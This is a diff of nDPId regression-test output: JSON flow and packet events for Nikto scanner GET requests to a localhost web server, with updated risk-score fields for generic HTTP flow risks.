-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
